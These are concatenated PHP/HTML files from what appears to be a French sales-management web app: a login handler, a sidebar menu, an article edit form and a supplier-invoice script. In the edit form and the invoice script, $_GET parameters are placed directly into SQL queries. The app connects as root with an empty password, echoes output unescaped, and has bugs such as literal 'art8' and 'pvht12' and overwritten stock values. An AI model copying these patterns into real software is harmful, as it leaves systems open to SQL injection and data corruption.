<div class=messenger-message-inner>Erreur: Compte Non Reconnu</div>
<div class=messenger-spinner>
<span class=messenger-spinner-side messenger-spinner-side-left>
<span class=messenger-spinner-fill></span>
</span>
<span class=messenger-spinner-side messenger-spinner-side-right>
<span class=messenger-spinner-fill></span>
</span>
</div>
</div>";
}
// sinon, alors la, il y a un gros problème :)
else {
$erreur = "<div class=messenger-message message alert error message-error alert-error messenger-will-hide-after>
<button data-dismiss=alert class=messenger-close type=button>×</button>
<div class=messenger-message-inner>Erreur: Plusieurs membres on le même login de connexion.</div>
<div class=messenger-spinner>
<span class=messenger-spinner-side messenger-spinner-side-left>
<span class=messenger-spinner-fill></span>
</span>
<span class=messenger-spinner-side messenger-spinner-side-right>
<span class=messenger-spinner-fill></span>
</span>
</div>
</div>";
}
}
else {
$erreur = '<div class=messenger-message message alert error message-error alert-error messenger-will-hide-after>
<button data-dismiss=alert class=messenger-close type=button>×</button>
<div class=messenger-message-inner>Erreur: Au mois un des champs est vide.</div>
<div class=messenger-spinner>
<span class=messenger-spinner-side messenger-spinner-side-left>
<span class=messenger-spinner-fill></span>
</span>
<span class=messenger-spinner-side messenger-spinner-side-right>
<span class=messenger-spinner-fill></span>
</span>
</div>
</div>';
}
}
?>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<title>LSI - GESTION COMMERCIALE</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<!-- BEGIN CORE CSS FRAMEWORK -->
<link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/jquery-notifications/css/messenger.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/jquery-notifications/css/messenger-theme-flat.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END CORE CSS FRAMEWORK -->
<!-- BEGIN CSS TEMPLATE -->
<link href="assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<!-- END CSS TEMPLATE -->
</head>
<!-- END HEAD -->
<!-- BEGIN BODY -->
<body class="error-body no-top">
<div class="container">
<div class="row login-container column-seperation">
<div class="col-md-5 col-md-offset-1">
<h2>Bienvenue sur GESTCRM</h2>
<p>Veuillez-vous connecter pour acceder à votre espace de vente<br>
<br>
</div>
<div class="col-md-5 "> <br>
<form id="login-form" class="login-form" action="login.php" method="post">
<div class="row">
<div class="form-group col-md-10">
<label class="form-label">Nom d'utilisateur</label>
<div class="controls">
<div class="input-with-icon right">
<i class=""></i>
<input type="text" name="login" id="txtusername" class="form-control">
</div>
</div>
</div>
</div>
<div class="row">
<div class="form-group col-md-10">
<label class="form-label">Mot de Passe</label>
<span class="help"></span>
<div class="controls">
<div class="input-with-icon right">
<i class=""></i>
<input type="password" name="pass" id="txtpassword" class="form-control">
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-10">
<button class="btn btn-primary btn-cons pull-right" type="submit" name="connexion" value="Connexion">Connexion</button>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="assets/js/login.js" type="text/javascript"></script>
<script type="text/javascript" src="assets/js/notifications.js"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><!-- BEGIN CONTENT -->
<div class="page-container row-fluid">
<!-- BEGIN SIDEBAR -->
<!-- BEGIN MENU -->
<div class="page-sidebar" id="main-menu">
<div class="page-sidebar-wrapper" id="main-menu-wrapper">
<!-- BEGIN MINI-PROFILE -->
<div class="user-info-wrapper">
<div class="profile-wrapper">
<img src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>2x.jpg" width="69" height="69" />
</div>
<div class="user-info">
<div class="greeting">Bievenue</div>
<div class="username"><?php echo $donnees_login['prenom']; ?> <span class="semi-bold"><?php echo $donnees_login['nom']; ?></span></div>
<div class="status">Status du service<a href="#">
<?php
if($donnee_server['status'] == 1){echo "<div class='status-icon green'></div>Online";}
if($donnee_server['status'] == 0){echo "<div class='status-icon red'></div>Offline";}
?>
</a></div>
</div>
</div>
<!-- END MINI-PROFILE -->
<!-- BEGIN SIDEBAR MENU -->
<ul>
<!-- BEGIN SELECTED LINK -->
<li class="">
<a href="<?php echo $rootsite; ?>">
<i class="icon-custom-home"></i>
<span class="title">Accueil</span>
<span class="selected"></span>
</a>
</li>
<!-- END SELECTED LINK -->
<!-- BEGIN BADGE LINK -->
<li class="">
<a href="javascript:;">
<i class="fa fa-folder-open"></i>
<span class="title">Donnée</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li>
<a href="javascript:;"><span class="title">Client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Liste des Clients</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/nouv.client.php">Nouveau Client</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Modifier un client</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Supprimer un client</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Article</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Liste des Articles</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/nouv.article.php">Nouvel Article</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Modifier un Article</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Supprimer un Article</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-suitcase"></i>
<span class="title">Achat</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/">Tableau de Bord des Achats</a></li>
<li>
<a href="javascript:;"><span class="title">Devis Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/devis/index.devis.php">Liste des Devis Fournisseur</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/nouv.devis.php">Nouveau Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/">Modifier un Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/">Supprimer un Devis</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Commande Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/commande/index.commande.php">Liste des Commandes</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/nouv.commande.php">Nouvelle Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/">Modifier une Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/">Supprimer une Commande</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Bon de Livraison Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/reception/index.reception.php">Liste des Receptions</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/reception/nouv.reception.php">Nouvelle Reception</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/reception/">Modifier une Reception</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/reception/">Supprimer une Reception</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Facture Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/facture/index.facture.php">Liste des Factures</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/nouv.facture.php">Nouvelle Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/">Modifier une Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/">Supprimer une Facture</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-shopping-cart"></i>
<span class="title">Ventes</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/">Tableau de Bord des Ventes</a></li>
<li>
<a href="javascript:;"><span class="title">Devis Client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Liste des Devis client</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/nouv.devis.php">Nouveau Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Modifier un Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Supprimer un Devis</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Commande client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Liste des Commandes</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/nouv.commande.php">Nouvelle Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Modifier une Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Supprimer une Commande</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Bon de Livraison client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Liste des livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/nouv.livraison.php">Nouvelle livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Modifier une livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Supprimer une livraison</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Facture client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Liste des Factures</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/nouv.facture.php">Nouvelle Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Modifier une Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Supprimer une Facture</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-eur"></i>
<span class="title">Tresorerie</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/tresorerie/caisse/">Gestion des Caisses</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/tpe/">Gestion des Terminaux de Paiement</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/traite/">Gestion des Traites et Prélevement</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/cpt/">Gestion des Comptes Bancaires</a></li>
<hr />
<li><a href="<?php echo $rootsite; ?>core/tresorerie/sit_client/">Situation Client</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/sit_fournisseur/">Situation Fournisseur</a></li>
<hr />
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_achat/">Journal des Achats</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_vente/">Journal des Ventes</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_tresorerie/">Journaux de Trésorerie</a></li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-eur"></i>
<span class="title">Outils</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/outils/newsletter/">Gestion Newsletter</li></a>
<li><a href="<?php echo $rootsite; ?>core/outils/support/">Support Ticket</a></li>
<li><a href="">Interface SAV</a></li>
<li><a href="">Gestion des Agenda</a></li>
</ul>
</li>
<div class="clearfix"></div>
<!-- END SIDEBAR WIDGETS -->
</div>
</div>
<!-- BEGIN SCROLL UP HOVER -->
<a href="#" class="scrollup">Scroll</a>
<!-- END SCROLL UP HOVER -->
<!-- END MENU -->
<!-- BEGIN SIDEBAR FOOTER WIDGET -->
<div class="footer-widget">
<span>Version: 1.0.0</span>
</div>
<!-- END SIDEBAR FOOTER WIDGET -->
<!-- END SIDEBAR -->
<!-- BEGIN PAGE CONTAINER--><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idarticle = $_GET['idarticle'];
$sql_article = mysql_query("SELECT * FROM article WHERE idarticle =".$idarticle);
$donnee_article = mysql_fetch_array($sql_article);
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Article</a></li>
<li><a href="modif.article.php" class="active"><span class="semi-bold">Modifier Article</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ARTICLE - <span class="semi-bold">Modifier Article</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Modifier <span class="semi-bold">Article</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.modif.article.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Information Générale</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Description</span> </a> </li>
<li data-target="#step3" class=""> <a href="#tab3" data-toggle="tab"> <span class="step">3</span> <span class="title">Tarif</span> </a> </li>
<li data-target="#step4" class=""> <a href="#tab4" data-toggle="tab"> <span class="step">4</span> <span class="title">Stock</span> </a> </li>
<li data-target="#step5" class=""> <a href="#tab5" data-toggle="tab"> <span class="step">5</span> <span class="title">Images</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Information Générale</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_article['idarticle']; ?>" class="form-control no-boarder " name="idarticle" id="txtFirstName" value= "<?php echo $donnee_article['idarticle']; ?>" hidden>
</div>
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_article['desc_court']; ?>" class="form-control no-boarder " name="desc_court" id="txtFirstName" value= "<?php echo $donnee_article['desc_court']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<select name="idfamillearticle" class="form-control no-boarder ">
<?php
$sql_famille_article = mysql_query("SELECT * FROM famille_article");
while($donnee_famille_article = mysql_fetch_array($sql_famille_article))
{
?>
<option value="<?php echo $donnee_famille_article['idfamillearticle']; ?>"><?php echo $donnee_famille_article['designation']; ?></option>
<?php } ?>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<select name="idfournisseur" class="form-control no-boarder ">
<?php
$sql_fournisseur = mysql_query("SELECT * FROM fournisseur");
while($donnee_fournisseur = mysql_fetch_array($sql_fournisseur))
{
?>
<option value="<?php echo $donnee_fournisseur['idfournisseur']; ?>"><?php echo $donnee_fournisseur['raison_social']; ?></option>
<?php } ?>
</select>
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['ref_fournisseur']; ?>" class="form-control no-boarder " name="ref_fournisseur" id="txtFirstName" value = "<?php echo $donnee_article['ref_fournisseur']; ?>" >
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['ref_interne']; ?>" class="form-control no-boarder " name="ref_interne" id="txtFirstName" value = "<?php echo $donnee_article['ref_interne']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<input type="text" class="form-control" name="date_debut" placeholder="<?php echo $donnee_article['date_debut']; ?>" value = "<?php echo $donnee_article['date_debut']; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<input type="text" class="form-control" name="date_fin" placeholder="<?php echo $donnee_article['date_fin']; ?>" value = "<?php echo $donnee_article['date_fin']; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<input type="text" placeholder="<?php echo $donnee_article['num_serie']; ?>" class="form-control no-boarder " name="num_serie" id="txtFirstName" value = "<?php echo $donnee_article['num_serie']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="<?php echo $donnee_article['code_barre']; ?>" class="form-control no-boarder " name="code_barre" id="txtFirstName" value = "<?php echo $donnee_article['code_barre']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">Description</span></h4>
<br>
<div class="row">
<div class="col-md-12">
<textarea row="12" col="12" name="desc_long" style="width: 1145px; height: 163px;"><?php echo $donnee_article['desc_long']; ?></textarea>
</div>
</div>
</div>
<div class="tab-pane" id="tab3"> <br>
<h4 class="semi-bold">Etape 3 - <span class="light">Tarif</span></h4>
<br>
<div class="row form-row">
<div class="col-md-3">
<label>Prix Achat HT</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_achat_ht']; ?>" class="form-control no-boarder " name="prix_achat_ht" id="txtFirstName" value= "<?php echo $donnee_article['prix_achat_ht']; ?>">
</div>
<div class="col-md-3">
<label>Prix de Vente HT</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_vente_ht']; ?>" class="form-control no-boarder " name="prix_vente_ht" id="txtFirstName" value = "<?php echo $donnee_article['prix_vente_ht']; ?>">
</div>
<div class="col-md-3">
<label>Prix de Vente TTC</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_vente_ttc']; ?>" class="form-control no-boarder " name="prix_vente_ttc" id="txtFirstName" value = "<?php echo $donnee_article['prix_vente_ttc']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab4"> <br>
<h4 class="semi-bold">Etape 4 - <span class="light">Stock</span></h4>
<br>
<div class="row form-row">
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['stock_minima']; ?>" class="form-control no-boarder " name="stock_minima" id="txtFirstName" value = "<?php echo $donnee_article['stock_minima']; ?>">
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['stock_reel']; ?>" class="form-control no-boarder " name="stock_reel" id="txtFirstName" value = "<?php echo $donnee_article['stock_reel']; ?>">
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['poids']; ?>" class="form-control no-boarder " name="poids" id="txtFirstName" value= "<?php echo $donnee_article['poids']; ?>">Kg
</div>
<div class="col-md-3">
<select name="duree_garantie" class="form-control no-boarder">
<option value="1">1 An</option>
<option value="2">2 Ans</option>
<option value="3">3 Ans</option>
<option value="5">5 Ans</option>
<option value="10">10 Ans</option>
<option value="99">A vie</option>
</select>
</div>
</div>
</div>
<div class="tab-pane" id="tab5"> <br>
<h4 class="semi-bold">Etape 5 - <span class="light">Images</span></h4>
<br>
<div class="row form-row">
<div class="col-md-4">
<input type="text" placeholder="<?php echo $donnee_article['images']; ?>" class="form-control no-boarder " name="images" id="txtFirstName" value = "<?php echo $donnee_article['images']; ?>">
</div>
</div>
<div class="row form-row">
<img src="<?php echo $donnee_article['images']; ?>" />
</div>
<div class="row form-row">
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</div>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/form_elements.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idreceptionfour = $_GET['idreceptionfour'];
//Import des élément de devis
$date = date("d-m-Y");
$date_mois30 = date("d-m-Y",strtotime("+30 DAYS"));
$sql_reception_four = mysql_query("SELECT * FROM `reception_four` WHERE idreceptionfour =".$idreceptionfour);
$donnee_reception_four = mysql_fetch_array($sql_reception_four);
$sql_cmd_four = mysql_query("SELECT * FROM cmd_four WHERE idcmdfour =".$donnee_reception_four['idcmdfour']);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
$idcmdfour = $donnee_reception_four['idcmdfour'];
$idfournisseur = $donnee_reception_four['idfournisseur'];
$date_reception_four = date("d-m-Y");
$art1 = $donnee_reception_four['art1'];
$art2 = $donnee_reception_four['art2'];
$art3 = $donnee_reception_four['art3'];
$art4 = $donnee_reception_four['art4'];
$art5 = $donnee_reception_four['art5'];
$art6 = $donnee_reception_four['art6'];
$art7 = $donnee_reception_four['art7'];
$art8 = $donnee_reception_four['art8'];
$art9 = $donnee_reception_four['art9'];
$art10 = $donnee_reception_four['art10'];
$art11 = $donnee_reception_four['art11'];
$art12 = $donnee_reception_four['art12'];
$qte1 = $donnee_reception_four['qte1'];
$qte2 = $donnee_reception_four['qte2'];
$qte3 = $donnee_reception_four['qte3'];
$qte4 = $donnee_reception_four['qte4'];
$qte5 = $donnee_reception_four['qte5'];
$qte6 = $donnee_reception_four['qte6'];
$qte7 = $donnee_reception_four['qte7'];
$qte8 = $donnee_reception_four['qte8'];
$qte9 = $donnee_reception_four['qte9'];
$qte10 = $donnee_reception_four['qte10'];
$qte11 = $donnee_reception_four['qte11'];
$qte12 = $donnee_reception_four['qte12'];
$pvht1 = $donnee_cmd_four['pvht1'];
$pvht2 = $donnee_cmd_four['pvht2'];
$pvht3 = $donnee_cmd_four['pvht3'];
$pvht4 = $donnee_cmd_four['pvht4'];
$pvht5 = $donnee_cmd_four['pvht5'];
$pvht6 = $donnee_cmd_four['pvht6'];
$pvht7 = $donnee_cmd_four['pvht7'];
$pvht8 = $donnee_cmd_four['pvht8'];
$pvht9 = $donnee_cmd_four['pvht9'];
$pvht10 = $donnee_cmd_four['pvht10'];
$pvht11 = $donnee_cmd_four['pvht11'];
$pvht12 = $donnee_cmd_four['pvht12'];
$port = $donnee_cmd_four['port'];
$remise = $donnee_cmd_four['remise'];
$eco_part = $donnee_cmd_four['eco-part'];
$ptht_cmd_four = $donnee_cmd_four['ptht_cmd_four'];
$taxe_cmd_four = $donnee_cmd_four['taxe_cmd_four'];
$ptttc_cmd_four = $donnee_cmd_four['ptttc_cmd_four'];
$sql_facture_four = "INSERT INTO `fact_four`(`idfactfour`, `idcmdfour`, `idreceptionfour`, `idfournisseur`, `date_facture_four`, `etat_fact_four`, `date_echeance_fact_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_fact_four`, `taxe_fact_four`, `ptttc_fact_four`)
VALUES ('','$idcmdfour','$idreceptionfour','$idfournisseur','$date','1','$date_mois30','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5',
'$art6','$qte6','$art7','$qte7','art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8',
'$pvht9','$pvht10','$pvht11','pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
$sql_article_stock1 = "UPDATE `article` SET `stock_reel`='-$qte1' WHERE desc_court ='$art1'";
$sql_article_stock2 = "UPDATE `article` SET `stock_reel`='-$qte2' WHERE desc_court ='$art2'";
$sql_article_stock3 = "UPDATE `article` SET `stock_reel`='-$qte3' WHERE desc_court ='$art3'";
$sql_article_stock4 = "UPDATE `article` SET `stock_reel`='-$qte4' WHERE desc_court ='$art4'";
$sql_article_stock5 = "UPDATE `article` SET `stock_reel`='-$qte5' WHERE desc_court ='$art5'";
$sql_article_stock6 = "UPDATE `article` SET `stock_reel`='-$qte6' WHERE desc_court ='$art6'";
$sql_article_stock7 = "UPDATE `article` SET `stock_reel`='-$qte7' WHERE desc_court ='$art7'";
$sql_article_stock8 = "UPDATE `article` SET `stock_reel`='-$qte8' WHERE desc_court ='$art8'";
$sql_article_stock9 = "UPDATE `article` SET `stock_reel`='-$qte9' WHERE desc_court ='$art9'";
$sql_article_stock10 = "UPDATE `article` SET `stock_reel`='-$qte10' WHERE desc_court ='$art10'";
$sql_article_stock11 = "UPDATE `article` SET `stock_reel`='-$qte11' WHERE desc_court ='$art11'";
$sql_article_stock12 = "UPDATE `article` SET `stock_reel`='-$qte12' WHERE desc_court ='$art12'";
mysql_query($sql_facture_four);
mysql_query($sql_article_stock1);
mysql_query($sql_article_stock2);
mysql_query($sql_article_stock3);
mysql_query($sql_article_stock4);
mysql_query($sql_article_stock5);
mysql_query($sql_article_stock6);
mysql_query($sql_article_stock7);
mysql_query($sql_article_stock8);
mysql_query($sql_article_stock9);
mysql_query($sql_article_stock10);
mysql_query($sql_article_stock11);
mysql_query($sql_article_stock12);
include ('../../../inc/header.php');
